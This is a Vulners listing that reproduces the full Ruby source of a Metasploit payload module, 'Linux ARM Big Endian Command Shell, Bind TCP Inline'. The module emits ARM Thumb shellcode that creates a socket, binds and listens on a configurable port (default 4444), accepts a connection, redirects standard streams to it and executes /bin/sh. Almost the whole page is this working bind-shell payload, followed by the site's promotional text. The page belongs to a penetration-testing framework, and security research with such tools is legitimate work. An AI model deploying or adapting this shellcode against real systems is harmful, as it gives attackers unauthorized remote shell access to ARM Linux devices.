Vulners
Lucene search
Linux ARM Big Endian Command Shell, Bind TCP Inline
🗓️ 09 Jun 2016 18:52:20Reported by Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>Type 
metasploit🔗 www.rapid7.com👁 57 Views
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
module MetasploitModule
CachedSize = 118
include Msf::Payload::Single
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'Linux ARM Big Endian Command Shell, Bind TCP Inline',
'Description' => 'Listen for a connection and spawn a command shell',
'Author' => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
'References' => [['URL', 'https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s']],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_ARMBE,
'Handler' => Msf::Handler::BindTcp,
'Session' => Msf::Sessions::CommandShellUnix
))
# Register command execution options
register_options(
[
OptString.new('CMD', [ true, "The command to execute.", "/bin/sh" ]),
Opt::LPORT(4444)
])
end
def generate(_opts = {})
cmd = (datastore['CMD'] || '') + "\x00"
bytehigh = (datastore['LPORT'].to_i >> 8).chr
bytelow = (datastore['LPORT'].to_i & 0xFF).chr
payload =
# turning on thumb mode
"\xe2\x8f\x60\x01" + # add r6, pc, #1 #
"\xe1\x2f\xff\x16" + # bx r6 #
# thumb mode on
# socket(2,1,0)
"\x1a\x92" + # sub r2, r2, r2 #
"\x1c\x51" + # add r1, r2, #1 #
"\x1c\x90" + # add r0, r2, #2 #
"\x02\x0f" + # lsl r7, r1, #8 #
"\x37\x19" + # add r7, r7, #0x19 #
"\xdf\x01" + # svc 1 #
"\x1c\x06" + # mov r6, r0 #
# bind()
"\x22\x02" + # mov r2, #2 #
"\x02\x12" + # lsl r2, r2, #8 #
"\x32"+bytehigh + # add r2, r2, #0xXX #
"\x02\x12" + # lsl r2, r2, #8 #
"\x32"+bytelow + # add r2, r2, #0xXX #
"\x1a\xdb" + # sub r3, r3, r3 #
"\x1b\x24" + # sub r4, r4, r4 #
"\x1b\x6d" + # sub r5, r5, r5 #
"\x46\x69" + # mov r1, sp #
"\xc1\x3c" + # stm r1!, {r2-r5} #
"\x39\x10" + # sub r1, #0x10 #
"\x22\x10" + # mov r2, #16 #
"\x37\x01" + # add r7, r7, #1 #
"\xdf\x01" + # svc 1 #
# listen()
"\x1c\x30" + # mov r0, r6 #
"\x1a\x49" + # sub r1, r1, r1 #
"\x37\x02" + # add r7, r7, #2 #
"\xdf\x01" + # svc 1 #
# accept()
"\x1c\x30" + # mov r0, r6 #
"\x1a\x92" + # sub r2, r2, r2 #
"\x37\x01" + # add r7, r7, #1 #
"\xdf\x01" + # svc 1 #
"\x1c\x06" + # mov r6, r0 #
# dup2()
"\x1a\x49" + # sub r1, r1, r1 #
"\x27\x3f" + # mov r7, #63 #
"\xdf\x01" + # svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x31\x01" + # add r1, r1, #1 #
"\xdf\x01" + # svc 1 #
"\x1c\x30" + # mov r0, r6 #
"\x31\x01" + # add r1, r1, #1 #
"\xdf\x01" + # svc 1 #
# execve()
"\x1a\x92" + # sub r2, r2, r2 #
"\x46\x78" + # mov r0, pc #
"\x30\x12" + # add r0, #18 #
"\x92\x02" + # str r2, [sp, #8] #
"\x90\x01" + # str r0, [sp, #4] #
"\xa9\x01" + # add r1, sp, #4 #
"\x27\x0b" + # mov r7, #11 #
"\xdf\x01" + # svc 1 #
# exit()
"\x1b\x24" + # sub r4, r4, r4 #
"\x1c\x20" + # mov r0, r4 #
"\x27\x01" + # mov r7, #1 #
"\xdf\x01" + # svc 1 #
cmd
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2025 14:31Current
7.5High risk
Vulners AI Score7.5